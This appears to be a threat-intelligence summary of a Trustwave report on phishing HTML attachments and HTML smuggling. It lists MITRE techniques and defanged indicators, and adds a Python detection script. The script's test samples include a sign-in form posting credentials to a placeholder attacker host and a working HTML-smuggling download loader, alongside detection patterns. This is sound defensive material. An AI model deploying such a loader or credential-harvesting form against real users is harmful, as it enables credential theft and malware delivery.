Trustwave SpiderLabs observes HTML file attachments being used prominently in phishing spam, with HTML/HTM collectively accounting for 14.09% of attachments, second only to EXE files. The report describes how these HTML attachments mimic sign-in pages and, in some cases, use HTML smuggling to deliver malware such as Qakbot and Trickbot, typically relying on obfuscated JavaScript and remotely hosted scripts to handle the form submission and exfiltrate the entered data. #Qakbot #Trickbot #HTMLSmuggling #DEV-0238 #DEV-0253 #DEV-0193
Keypoints
- HTML and HTM attachments are a notable portion of spam, totaling 14.09% of attachments, following EXE files in prevalence.
- Phishing HTML attachments typically imitate sign-in pages for services like Microsoft, Google, or online banking to steal credentials.
- Threat actors DEV-0238 and DEV-0253 use HTML attachments with HTML smuggling to deliver keyloggers; DEV-0193 is linked to Trickbot via HTML smuggling.
- Phishing HTML files usually contain no malicious code themselves; the danger is the embedded sign-in form, which posts whatever the victim enters to an actor-controlled handler, enabling credential theft.
- Adversaries obfuscate the code and load the JavaScript and CSS that handle the form action and data exfiltration from remote servers, including legitimate CDNs, so the attachment itself carries little beyond the lure.
- HTML smuggling delivers malware by embedding the binary as an encoded data blob (typically base64) inside the page's JavaScript; the browser decodes it locally, presents a download, and social engineering persuades the user to save and run the resulting file.
- Because the gateway inspects only the attachment and not the scripts it fetches at render time, obfuscation makes email gateway detection harder; social engineering compounds the effectiveness of these attacks.
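The keypoints above describe three things a gateway or analyst can look for statically in an HTML attachment: a sign-in form whose action or handler script lives on a remote host, obfuscator fingerprints in the inline JavaScript, and the browser APIs an HTML-smuggling loader needs to turn an embedded blob into a download. The following Python triage script is an added example written for this summary; it is not code from the Trustwave report. Both sample attachments are constructed here: the hostnames attacker.example and cdn.example are placeholders, the "binary" in the smuggling sample is a zero-filled stand-in rather than a real executable, and the scoring weights and thresholds are arbitrary starting points to be tuned against real samples.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Browser APIs and artefacts an HTML-smuggling loader needs to turn an embedded
# data blob into a file download (matched over the whole attachment).
SMUGGLING_PATTERNS = {
    "atob": r"\batob\s*\(",
    "blob": r"new\s+Blob\s*\(",
    "object_url": r"URL\.createObjectURL\s*\(",
    "ms_save_blob": r"msSaveOrOpenBlob\s*\(",
    "download_attr": r"\.download\s*=|\bdownload\s*=\s*[\"']",
    "long_base64": r"[A-Za-z0-9+/]{2000,}={0,2}",
}

# Common fingerprints of JavaScript Obfuscator style output (matched over inline script only).
OBFUSCATION_PATTERNS = {
    "hex_identifiers": r"\b_0x[0-9a-f]{4,}\b",
    "fromCharCode": r"String\.fromCharCode\s*\(",
    "eval_unescape": r"\b(?:eval|unescape)\s*\(",
}


class _Collector(HTMLParser):
    """Collect the parts of the attachment the triage rules look at."""

    def __init__(self):
        super().__init__()
        self.form_actions = []   # action= of every <form>
        self.remote_assets = []  # src/href of external scripts and stylesheets
        self.inputs = []         # (name, type) of every <input>
        self.inline_js = []      # text of inline <script> blocks
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input":
            self.inputs.append((a.get("name") or "", (a.get("type") or "text").lower()))
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.remote_assets.append(a["src"])
        elif tag == "link" and "stylesheet" in (a.get("rel") or "").lower() and a.get("href"):
            self.remote_assets.append(a["href"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline_js.append(data)


def _remote_host(url):
    """Host of an absolute http(s) URL; '' for relative (same-file) targets."""
    url = url.strip()
    if url.startswith("//"):  # protocol-relative URLs still fetch remotely
        url = "https:" + url
    p = urlparse(url)
    return p.netloc.lower() if p.scheme in ("http", "https") else ""


def triage(html, trusted_hosts=()):
    """Score one HTML attachment. trusted_hosts is an analyst-supplied set of
    hosts considered legitimate for this sender (an assumption of the caller)."""
    c = _Collector()
    c.feed(html)
    c.close()
    js = "".join(c.inline_js)
    trusted = {h.lower() for h in trusted_hosts}

    def untrusted(urls):
        return [u for u in urls if _remote_host(u) and _remote_host(u) not in trusted]

    f = {
        "remote_form_actions": untrusted(c.form_actions),
        "remote_assets": untrusted(c.remote_assets),
        "credential_inputs": [n for n, t in c.inputs
                              if t == "password" or re.search(r"pass|user|email|login", n, re.I)],
        "smuggling": [k for k, p in SMUGGLING_PATTERNS.items() if re.search(p, html)],
        "obfuscation": [k for k, p in OBFUSCATION_PATTERNS.items() if re.search(p, js)],
    }
    score = 0
    # A form posting off-box, or credential fields plus an off-box handler script.
    if f["remote_form_actions"] or (f["credential_inputs"] and f["remote_assets"]):
        score += 2
    score += min(len(f["smuggling"]), 3) + min(len(f["obfuscation"]), 2)
    f["score"] = score
    if len(f["smuggling"]) >= 3:
        f["verdict"] = "html_smuggling"
    elif score >= 2:
        f["verdict"] = "credential_phish"
    else:
        f["verdict"] = "clean"
    return f


# Constructed sample 1: sign-in lookalike whose form posts to a host the sender
# does not own and whose handler script/CSS are loaded remotely (placeholder hosts).
PHISH_SAMPLE = """<html><head>
<link rel="stylesheet" href="https://cdn.example/themes/css/login.css">
<script src="https://attacker.example/js/post.js"></script>
</head><body>
<form action="https://attacker.example/collect.php" method="post">
  <input name="email" type="text"><input name="password" type="password">
  <button>Sign in</button>
</form></body></html>"""

# Constructed sample 2: the canonical HTML-smuggling loader. The "binary" is a
# zero-filled stand-in, not a real executable; the script decodes it in the
# browser and triggers a download of the decoded bytes.
_FAKE_BINARY_B64 = base64.b64encode(b"MZ" + b"\x00" * 1600).decode()
SMUGGLE_SAMPLE = """<html><body><script>
var _0x4f2a = ['__B64__'];
var raw = atob(_0x4f2a[0]);
var buf = new Uint8Array(raw.length);
for (var i = 0; i < raw.length; i++) { buf[i] = raw.charCodeAt(i); }
var blob = new Blob([buf], {type: 'application/octet-stream'});
var a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'ScannedDocument.img';
a.click();
</script></body></html>""".replace("__B64__", _FAKE_BINARY_B64)

if __name__ == "__main__":
    for name, sample in (("phish", PHISH_SAMPLE), ("smuggle", SMUGGLE_SAMPLE)):
        r = triage(sample)
        print(f"{name}: verdict={r['verdict']} score={r['score']} smuggling={r['smuggling']}")
```

The smuggling rule deliberately requires several of the loader APIs together rather than any one of them, since atob or Blob alone appear in plenty of legitimate pages; what no benign sign-in page needs is a multi-kilobyte base64 string decoded into a Blob and handed to an anchor with a download attribute. The phishing rule mirrors the report's observation that the attachment itself is near-empty: a credential form whose action or handler script resolves to a host the sender does not own is the signal, which is why the script lets the caller pass the hosts it trusts.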
MITRE Techniques
- [T1566] Phishing: HTML attachments mimic sign-in pages to steal credentials. "The HTML file attachments mimic the sign-in page for services like Microsoft, Google or online banking pages and the danger is when a user falls for the scam, enters their credentials into the form, and submits it."
- [T1204] User Execution: the user is deceived into saving and running the decoded binary after the browser's download bar appears. "A download notification bar is then displayed to the user. With a combination of social engineering, it lures the target user to save the binary to the disk to open it."
- [T1105] Ingress Tool Transfer: JavaScript, CSS and other assets are fetched at render time from servers the actor controls, which supply the form handler and exfiltration logic. "Usually, the JavaScript that handles the data exfiltration is hosted by the actor's web server (or operated by them)."
- [T1027] Obfuscated Files or Information: the JavaScript is obfuscated to evade detection. "JavaScript codes are usually obfuscated with open-source tools like JavaScript Obfuscator."
Indicators of Compromise
- [URLs]: hxxps://valdia[.]quatiappcn[.]pw, hxxps://fatnaoacnsoxzssa[.]web[.]app/nyrsjhrgsdvxzzx/themes/css/435d220bee10a57b635805e70b50fd90nbr1657558944[.]css, hxxps://fatnaoacnsoxzssa[.]web[.]app/nyrsjhrgsdvxzzx/themes/css/2a4e8eea72f5947287e793a9b9355d9fnbr1657558944[.]css (the web[.]app entries are remotely loaded assets on Firebase Hosting, the legitimate-hosting pattern noted above)
- [Hashes] (SHA256): 8ac0f6c2c31934801c4c6ae5606997b5c84a59290287059ec8ea68754921899a, e1c7c9ba81d2c8bd09b1cdc25ccb44e6763f8906486c5298c40efcb2133ad017, cecfabcc1b8f0467a0f646d0a75bd3a94e71c1a2ca41380b75f3a60e7827d2b9, 1cbc3422305b203bba574a0d59263e377c61a198f229430131570045c59a3521
- [File names]: ScannedDocuments_9720709.html.zip, ScannedDocuments_9720709.html, ScannedDocuments_9720709.img